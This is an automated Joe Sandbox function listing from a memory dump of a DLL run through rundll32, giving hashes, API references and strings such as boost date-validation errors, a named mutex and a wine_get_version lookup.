Opcode ID: 8a6b292085a8c483b0c6d12ac5aaed19cd9904a40244aa3c24440ccd578ddf43
Instruction ID: ef81793216e7ef74e2c88bb7d7226899d6685aeac75a444bc3956c1185cf8f74
Opcode Fuzzy Hash: 8a6b292085a8c483b0c6d12ac5aaed19cd9904a40244aa3c24440ccd578ddf43
Instruction Fuzzy Hash: FE71B672B0861286E76C8F29E0A597C37A0FB45F58F941176CA2BC22DCDF38E481C724

Function 00007FFDFA931190 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 122COMMON

Download Yara Rule

APIs

wcsftime.LIBCMT ref: 00007FFDFA931338

Strings

%Y-%m-%dT%H:%M:%S, xrefs: 00007FFDFA931314
NGUgNGMgNTMgMzEgMmUgMzA, xrefs: 00007FFDFA931221

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: wcsftime
String ID: %Y-%m-%dT%H:%M:%S$NGUgNGMgNTMgMzEgMmUgMzA
API String ID: 2902305603-1341811953
Opcode ID: 1f87d9ad49f6b3f5dd8f6bf09aecee88d6a750e74ad7d67324e1c3aa1ad1c37d
Instruction ID: 1561228889598476887f234515c9a7e68261fcfcf520fb2ecd712eb2bdd462bd
Opcode Fuzzy Hash: 1f87d9ad49f6b3f5dd8f6bf09aecee88d6a750e74ad7d67324e1c3aa1ad1c37d
Instruction Fuzzy Hash: 5951C151B0C68281EB18DB21E470BB963A4FF84B84FD481B1DE6D876EADF2CE0468700

Function 00007FFDFA998A20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FFDFA998B37
GetLastError.KERNEL32 ref: 00007FFDFA998B59

Strings

U, xrefs: 00007FFDFA998AE3

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 0231ec4354a956eba8029a57e9bc16ed1eb55dd06b0683d52583d18573d2c8ca
Instruction ID: ef8db258f65d86003252f98c20893cf893c88b5447e0c3b9757eec2aabab36be
Opcode Fuzzy Hash: 0231ec4354a956eba8029a57e9bc16ed1eb55dd06b0683d52583d18573d2c8ca
Instruction Fuzzy Hash: BC41E372B18A4296DB208F25E854BAA7760FB88798F848035EE5DC7798EF3CE441C740

Function 00007FFDFA901C54 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84COMMON

Download Yara Rule

APIs

std::_Deallocate.LIBCONCRT ref: 00007FFDFA901D3E
std::_Deallocate.LIBCONCRT ref: 00007FFDFA901D5B

Strings

WmiBrightnessControl.cpp, xrefs: 00007FFDFA901C57

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Deallocatestd::_
String ID: WmiBrightnessControl.cpp
API String ID: 1323251999-137989277
Opcode ID: 5683d2e524f9351041a721a0c04e413ec95e80fa3b52c9a7dfb8d9ba8b9472aa
Instruction ID: c70d2305482f9ea2cd591d23d0d4b61dc96ea9dbb71cddf082048cce1cbe0bed
Opcode Fuzzy Hash: 5683d2e524f9351041a721a0c04e413ec95e80fa3b52c9a7dfb8d9ba8b9472aa
Instruction Fuzzy Hash: 7031E537B1465186EB28CF24C41497973A5FB84BD0BA88276DB2E877DDCE38E845C740

Function 00007FFDFA8CF2C4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

APIs

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00007FFDFA8CF3B5
std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00007FFDFA8CF3D6

Strings

0, xrefs: 00007FFDFA8CF35E

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Ios_base_dtorstd::ios_base::_
String ID: 0
API String ID: 323602529-4108050209
Opcode ID: 2e7e9fc904eb75d695e215548ad9ebea77f15dcf7aa71a62d1169850791a812e
Instruction ID: 8832646d6742943c865a095fccc143ae35666e2e094c3f18f99f137a45ed850a
Opcode Fuzzy Hash: 2e7e9fc904eb75d695e215548ad9ebea77f15dcf7aa71a62d1169850791a812e
Instruction Fuzzy Hash: 2131AF32719B419AE714CF20E4506DD77B4FB48798F900276EAAC43BA9DF38E645C780

Function 00007FFDFA8B27FC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMONLIBRARYCODE

Download Yara Rule

APIs

std::runtime_error::runtime_error.LIBCPMT ref: 00007FFDFA8B28D6
throw_exception.LIBCPMT ref: 00007FFDFA8B28DF

Strings

Day of month is not valid for year, xrefs: 00007FFDFA8B28BC

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: std::runtime_error::runtime_errorthrow_exception
String ID: Day of month is not valid for year
API String ID: 3828811160-1521898139
Opcode ID: 84d2daf90518049316943645cf0e5bb3eec30a983e3c40179046461e36576ec1
Instruction ID: 8bfda7b5aff10cf81d316a63b0b62e0587cc075798bbc879701084262d66343a
Opcode Fuzzy Hash: 84d2daf90518049316943645cf0e5bb3eec30a983e3c40179046461e36576ec1
Instruction Fuzzy Hash: E4217622F28A0280F7289721D424DB82250FB947C0F5102B3EA7D87BECEE3DD8428780

Function 00007FFDFA908584 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 00007FFDFA9085DC
new.LIBCMT ref: 00007FFDFA908643

Strings

Feature_Unknown, xrefs: 00007FFDFA908601

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID:
String ID: Feature_Unknown
API String ID: 0-3679009740
Opcode ID: 6e9bd629d3c206ce81867abf616b261f8af43b60406001abd156afb56745f70f
Instruction ID: 86b9601953261e0cfea55e3ee027383a3dbecb5c3a2059957a1f51d66ae2fde3
Opcode Fuzzy Hash: 6e9bd629d3c206ce81867abf616b261f8af43b60406001abd156afb56745f70f
Instruction Fuzzy Hash: BB314873B20B899AEB058F34C4503EC33B1EB98B58F458635DA5C56B89EF78D654C390

Function 00007FFDFA995BA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_set_errno_from_matherr.LIBCMT ref: 00007FFDFA995C4C
_set_errno_from_matherr.LIBCMT ref: 00007FFDFA995C60

Strings

exp, xrefs: 00007FFDFA995BC7

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: _set_errno_from_matherr
String ID: exp
API String ID: 1187470696-113136155
Opcode ID: 02aa0f55b1a8874f43537a2706ad28b239fe5dfa3cfbce0507dbe8f83b3ef5ac
Instruction ID: 837ab86a3b958e9ffa00f9db8c07ea439efda1c1dab06a9aae4fb31e28e4b6b8
Opcode Fuzzy Hash: 02aa0f55b1a8874f43537a2706ad28b239fe5dfa3cfbce0507dbe8f83b3ef5ac
Instruction Fuzzy Hash: D6213136B1C64597D764CF28E4A066B72A4FB8C344F900175E69DC2B99EF3CD8048F00

Function 00007FFDFA8B6E24 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNEL32 ref: 00007FFDFA8B6ECD

Part of subcall function 00007FFDFA8BEA24: std::_Deallocate.LIBCONCRT ref: 00007FFDFA8BEA6E

Strings

{C40CFCD4-C757-4139-A4DA-7CB51A8DBF80}, xrefs: 00007FFDFA8B6E98, 00007FFDFA8B6EA7
Global\, xrefs: 00007FFDFA8B6E63, 00007FFDFA8B6E72

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: CreateDeallocateMutexstd::_
String ID: Global\${C40CFCD4-C757-4139-A4DA-7CB51A8DBF80}
API String ID: 2784379168-266908802
Opcode ID: 02ab40d601c47c4bd6e5fdae253d9982c0720896644d64d585b2e25be54e70d6
Instruction ID: 22e78742bda67731b66761e91d9f89378c5f1668d757719ece6ad95e2aacbc9b
Opcode Fuzzy Hash: 02ab40d601c47c4bd6e5fdae253d9982c0720896644d64d585b2e25be54e70d6
Instruction Fuzzy Hash: 54219232728A4280EB24DB25E8615AE7361EB887E4F945372D67C87AE9DE3CD541C740

Function 00007FFDFA8C0794 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00007FFDFA8C0814

Part of subcall function 00007FFDFA8C4824: _CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA8C485D

Part of subcall function 00007FFDFA8B4D08: WaitForSingleObjectEx.KERNEL32 ref: 00007FFDFA8B4D62

Strings

boost unique_lock has no mutex, xrefs: 00007FFDFA8C07CD
boost unique_lock owns already the mutex, xrefs: 00007FFDFA8C07F1

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: CurrentExceptionObjectSingleThreadThrowWait
String ID: boost unique_lock has no mutex$boost unique_lock owns already the mutex
API String ID: 928027368-3352860666
Opcode ID: 994a6202a9c3685202e8c49310c65bffd27d361856865c6016e354541c512811
Instruction ID: 85c33bff43b1f8c9a888e3d84514a3437dda337154c51ae1d4b3f21386d6f869
Opcode Fuzzy Hash: 994a6202a9c3685202e8c49310c65bffd27d361856865c6016e354541c512811
Instruction Fuzzy Hash: 5D21D5317296C285EB28CB20D464BA87360FB44B98F948272DA7D477D9CF7CE545CB80

Function 00007FFDFA8B234C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

__std_exception_copy.LIBVCRUNTIME ref: 00007FFDFA8B23D4
std::_Deallocate.LIBCONCRT ref: 00007FFDFA8B23FA

Strings

Day of year value is out of range 1..366, xrefs: 00007FFDFA8B2384, 00007FFDFA8B2393

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Deallocate__std_exception_copystd::_
String ID: Day of year value is out of range 1..366
API String ID: 3694657363-4072519960
Opcode ID: ab36d1336ac458bd2dea0bf6fadc49879dfd2f429f3452fa44419b5642cab8d2
Instruction ID: 97fe46c2431fe43581308b8ef77963e1f2c044c8752006797d530c45241321aa
Opcode Fuzzy Hash: ab36d1336ac458bd2dea0bf6fadc49879dfd2f429f3452fa44419b5642cab8d2
Instruction Fuzzy Hash: FF214832B14A0188FB048F64E8607EC37B4BB08798F941176DA6D96AEDDF38D585C350

Function 00007FFDFA8B2274 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

__std_exception_copy.LIBVCRUNTIME ref: 00007FFDFA8B22FC
std::_Deallocate.LIBCONCRT ref: 00007FFDFA8B2322

Strings

Weekday is out of range 0..6, xrefs: 00007FFDFA8B22AC, 00007FFDFA8B22BB

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Deallocate__std_exception_copystd::_
String ID: Weekday is out of range 0..6
API String ID: 3694657363-1292618072
Opcode ID: 5712023aab23666bcc4aa939f3a77f028e085d8234eb82f5ada7f38f23bd60ce
Instruction ID: f5f8b3d1e51044b83f47f99d8b6a263b281f087666a2897d67dd5dc930b0a018
Opcode Fuzzy Hash: 5712023aab23666bcc4aa939f3a77f028e085d8234eb82f5ada7f38f23bd60ce
Instruction Fuzzy Hash: EF214832B14A0188FB048F64E8607EC37B4AB087A8F941576DA6D966EDDF78D585C350

Function 00007FFDFA8B2724 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

__std_exception_copy.LIBVCRUNTIME ref: 00007FFDFA8B27AC
std::_Deallocate.LIBCONCRT ref: 00007FFDFA8B27D2

Strings

Month number is out of range 1..12, xrefs: 00007FFDFA8B275C, 00007FFDFA8B276B

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Deallocate__std_exception_copystd::_
String ID: Month number is out of range 1..12
API String ID: 3694657363-4198407886
Opcode ID: 2a1ac6ef3aeba2bd9865e4ebf9b20a26fcd048e8fe28fa3fbc9b1659af5c6910
Instruction ID: 5b109f077efcc40cee8b25248c9fadef71989230ec034b94a787a3926331d009
Opcode Fuzzy Hash: 2a1ac6ef3aeba2bd9865e4ebf9b20a26fcd048e8fe28fa3fbc9b1659af5c6910
Instruction Fuzzy Hash: 29213632B14A0188FB048F64E8607AC37B4AB48798F941676DA6D96AEDDF38D585C350

Function 00007FFDFA8B2550 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

__std_exception_copy.LIBVCRUNTIME ref: 00007FFDFA8B25D8
std::_Deallocate.LIBCONCRT ref: 00007FFDFA8B25FE

Strings

Year is out of valid range: 1400..10000, xrefs: 00007FFDFA8B2588, 00007FFDFA8B2597

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Deallocate__std_exception_copystd::_
String ID: Year is out of valid range: 1400..10000
API String ID: 3694657363-2344417016
Opcode ID: 072e68aaa3e467892ea3da7818a1ab6e2fd58acdb12903a67d2c210c5a44a482
Instruction ID: 01d71b7a806813b6952c2c841627f051e11ae32c3ec0b75424d768b46ef02431
Opcode Fuzzy Hash: 072e68aaa3e467892ea3da7818a1ab6e2fd58acdb12903a67d2c210c5a44a482
Instruction Fuzzy Hash: B2214832B14A0198FB048F64E8A07EC37B4AB087A8F940576DA6D967EDDF78D585C350

Function 00007FFDFA945290 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FFDFA9452E5
GetProcAddress.KERNEL32 ref: 00007FFDFA9452FA

Strings

wine_get_version, xrefs: 00007FFDFA9452F0

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
